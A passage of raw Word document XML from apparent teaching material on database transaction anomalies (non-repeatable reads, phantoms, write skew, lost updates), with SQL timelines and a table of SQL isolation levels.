    <w:p w14:paraId="52F9522B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: BEGIN; UPDATE accounts SET balance = 500 WHERE id = 1; COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D20D85" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: SELECT balance FROM accounts WHERE id = 1 → 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D6F40" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (different from first read — non-repeatable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581AC1D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4A16A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Example harm: application logic assumes balance is stable within transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA120EC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                First read: balance = 1000, approve loan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678C72A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                Second read: balance = 500, calculate collateral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D7067" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                → Decision made on inconsistent view of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214DC03D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3ED4AD11" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Phantom Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00004BE8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  A query returning a set of rows returns different rows when re-executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CB7E2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Another committed transaction inserted or deleted rows matching the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D72036" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB8757" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283F8A2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE64B7F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: SELECT COUNT(*) FROM orders WHERE status = 'pending' → 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB2FA9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: INSERT INTO orders (status) VALUES ('pending'); COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45904F25" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: SELECT COUNT(*) FROM orders WHERE status = 'pending' → 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3915BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (a "phantom" row appeared)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503983A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3B520" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Example harm: claim "there are 5 pending orders" then process them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61784E1C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                By the time processing completes: 6 pending orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F597EEE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                → Missed processing one order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07676CD8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="25C76207" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Write Skew:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D086BED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Two concurrent transactions each read overlapping data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77214494" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  make decisions based on what they read, then each writes to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250C7BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  non-overlapping data — but the combination violates a constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000BA61C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F02ABB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4285D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Constraint: at least one doctor must be on call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD7CDB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Currently: Alice on call, Bob on call (2 doctors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139BCE2E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B416E69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A (Alice requests off-call):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783598B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      SELECT COUNT(*) FROM on_call WHERE on_call = TRUE → 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30BE3C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      (safe to release — 2 doctors, one can leave)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FED325" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      UPDATE doctors SET on_call = FALSE WHERE id = alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F719FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD0029" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TXN B (Bob requests off-call, concurrent with A):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC0B66" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      SELECT COUNT(*) FROM on_call WHERE on_call = TRUE → 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E0E1D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      (safe to release — 2 doctors, one can leave)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF04201" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      UPDATE doctors SET on_call = FALSE WHERE id = bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221078B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B179F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Both commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835E41C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Alice: on_call = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567CEC99" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Bob:   on_call = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D8F0A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Count: 0 doctors on call → constraint violated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB523DB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D95BA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Why not caught by unique/FK constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD5BC24" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      The constraint is multi-row ("at least one TRUE")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F7411" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      No single-row constraint can express this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F34727D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Application must use proper isolation or explicit locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18F5BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="6A97FC58" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Lost Update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B8AE02" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Two concurrent transactions both read a value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF86E19" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  compute a new value, and write — the second write overwrites the first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA49A16" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B81223" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349CA1E1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: READ counter → 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FB146B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: READ counter → 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764B4B59" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: WRITE counter = 10 + 1 = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196868D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: WRITE counter = 10 + 1 = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B49462" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Final: counter = 11 (should be 12 — one increment was lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD402E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4983F09D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Example harm: concurrent view count increments → count is wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B290F2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                Concurrent inventory decrements → oversell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F92EC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Isolation Level Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696416A3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL standard defines four isolation levels, each preventing different anomalies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5602E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12078CF2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Isolation Level     │ Dirty  │ Non-Rep │ Phantom │ Write  │ Lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6D749" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    │ Read   │ Read    │ Read    │ Skew   │ Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DEE46" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675ADCB4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Read Uncommitted    │  Yes   │  Yes    │  Yes    │  Yes   │  Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1C72D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Read Committed      │   No   │  Yes    │  Yes    │  Yes   │  Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2BE66" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Repeatable Read     │   No   │   No    │  Yes*   │  Yes*  │   No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF199C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Serializable        │   No   │   No    │   No    │   No   │   No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6453F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0DFB57FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>* PostgreSQL's Repeatable Read (Snapshot Isolation) also prevents phantoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B06B4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  and some write skew — stronger than SQL standard requires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED3561" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read Committed — the most common production default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925AC2C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254AD70C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>PostgreSQL, Oracle, SQL Server default isolation level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328B0A4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0B0D4FC9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Implementation: each statement sees a fresh snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA7B15" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Every statement within the transaction sees all data committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45109CC9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEFORE that statement started (not before the transaction started)</w:t>
      </w:r>
    </w:p>
